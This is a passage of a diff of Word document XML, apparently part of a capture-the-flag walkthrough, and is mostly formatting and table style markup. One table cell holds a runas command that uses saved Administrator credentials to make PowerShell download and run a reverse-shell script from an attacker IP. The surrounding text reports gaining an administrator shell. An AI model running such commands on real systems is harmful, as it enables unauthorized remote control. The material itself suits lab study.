+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:i w:val="1"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.25/Rev-9002.ps1')"</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Upon receiving the shell back, we check who we are and find ourselves as administrator!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Table22"/>
+        <w:tblW w:w="9360.0" w:type="dxa"/>
+        <w:jc w:val="center"/>
+        <w:tblBorders>
+          <w:top w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:left w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:bottom w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:right w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:insideH w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+          <w:insideV w:color="000000" w:space="0" w:sz="8" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0600"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+        <w:tblGridChange w:id="0">
+          <w:tblGrid>
+            <w:gridCol w:w="9360"/>
+          </w:tblGrid>
+        </w:tblGridChange>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit w:val="0"/>
+          <w:tblHeader w:val="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:shd w:fill="auto" w:val="clear"/>
+            <w:tcMar>
+              <w:top w:w="100.0" w:type="dxa"/>
+              <w:left w:w="100.0" w:type="dxa"/>
+              <w:bottom w:w="100.0" w:type="dxa"/>
+              <w:right w:w="100.0" w:type="dxa"/>
+            </w:tcMar>
+            <w:vAlign w:val="top"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:pageBreakBefore w:val="0"/>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:space="0" w:sz="0" w:val="nil"/>
+                <w:left w:space="0" w:sz="0" w:val="nil"/>
+                <w:bottom w:space="0" w:sz="0" w:val="nil"/>
+                <w:right w:space="0" w:sz="0" w:val="nil"/>
+                <w:between w:space="0" w:sz="0" w:val="nil"/>
+              </w:pBdr>
+              <w:shd w:fill="auto" w:val="clear"/>
+              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
+              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
+                  <wp:extent cx="4819650" cy="1562100"/>
+                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
+                  <wp:docPr id="20" name="image7.png"/>
+                  <a:graphic>
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic>
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="image7.png"/>
+                          <pic:cNvPicPr preferRelativeResize="0"/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId30"/>
+                          <a:srcRect b="0" l="0" r="0" t="0"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="4819650" cy="1562100"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect"/>
+                          <a:ln/>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rtl w:val="0"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="24"/>
@@ -5018,6 +6440,84 @@
       </w:tblCellMar>
     </w:tblPr>
   </w:style>
+  <w:style w:type="table" w:styleId="Table17">
+    <w:basedOn w:val="TableNormal"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblCellMar>
+        <w:top w:w="100.0" w:type="dxa"/>
+        <w:left w:w="100.0" w:type="dxa"/>
+        <w:bottom w:w="100.0" w:type="dxa"/>
+        <w:right w:w="100.0" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="Table18">
+    <w:basedOn w:val="TableNormal"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblCellMar>
+        <w:top w:w="100.0" w:type="dxa"/>
+        <w:left w:w="100.0" w:type="dxa"/>
+        <w:bottom w:w="100.0" w:type="dxa"/>
+        <w:right w:w="100.0" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="Table19">
+    <w:basedOn w:val="TableNormal"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblCellMar>
+        <w:top w:w="100.0" w:type="dxa"/>
+        <w:left w:w="100.0" w:type="dxa"/>
+        <w:bottom w:w="100.0" w:type="dxa"/>
+        <w:right w:w="100.0" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="Table20">
+    <w:basedOn w:val="TableNormal"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblCellMar>
+        <w:top w:w="100.0" w:type="dxa"/>
+        <w:left w:w="100.0" w:type="dxa"/>
+        <w:bottom w:w="100.0" w:type="dxa"/>
+        <w:right w:w="100.0" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="Table21">
+    <w:basedOn w:val="TableNormal"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblCellMar>
+        <w:top w:w="100.0" w:type="dxa"/>
+        <w:left w:w="100.0" w:type="dxa"/>
+        <w:bottom w:w="100.0" w:type="dxa"/>
+        <w:right w:w="100.0" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="Table22">
+    <w:basedOn w:val="TableNormal"/>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblCellMar>
+        <w:top w:w="100.0" w:type="dxa"/>
+        <w:left w:w="100.0" w:type="dxa"/>
+        <w:bottom w:w="100.0" w:type="dxa"/>
+        <w:right w:w="100.0" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
 </w:styles>
 </file>
 

</xml_diff>